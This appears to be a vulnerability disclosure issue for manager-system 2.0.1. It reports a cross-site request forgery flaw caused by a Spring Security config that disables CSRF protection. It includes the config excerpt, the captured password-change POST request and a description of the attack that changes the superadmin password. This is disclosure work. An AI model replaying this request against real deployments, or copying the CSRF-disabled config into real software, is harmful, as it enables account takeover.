manager-system
manager-system copied to clipboard
ZeroWdd
manager-system 2.0.1 has a CSRF
Source code name:manager-system Source code version:2.0.1 Source code download link:https://github.com/ZeroWdd/manager-system/archive/refs/heads/master.zip
Code Audit:
@Override
protected void configure(HttpSecurity http) throws Exception {
http.addFilterAfter(dynamicallyUrlInterceptor(), FilterSecurityInterceptor.class)
.authorizeRequests()
.antMatchers("/manager/login").permitAll()
.antMatchers("/mystatic/**","/layuiadmin/**","/font-awesome-4.7.0/**").permitAll()
.antMatchers("/**")
.fullyAuthenticated()
.and()
.formLogin().loginPage("/manager/login").successHandler(loginSuccessHandler).failureHandler(loginFailureHandler)
.and()
.headers().frameOptions().disable() // 防止报Refused to display in a frame because it set 'X-Frame-Options' to 'DENY'错误
.and()
.csrf().disable();
}
Vulnerability exploitation: http://localhost:8080/manager/index superadmin/123 Click to edit
Input:
当前密码: 123
新密码: admin123
确认新密码: admin123
Click to modify now
Corresponding data packet:
POST /manager/editPassword HTTP/1.1
Host: localhost:8080
Content-Length: 53
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Not.A/Brand";v="99", "Chromium";v="136"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/manager/password
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=927B6116C0986E8F8132E7EB30578BE1
Connection: keep-alive
password=123&newpassword=admin123&repassword=admin123
generator poc
attack
click submit request
When I entered the account and password as "superadmin/123", I found that the login failed.The account password has been modified by the attacker.
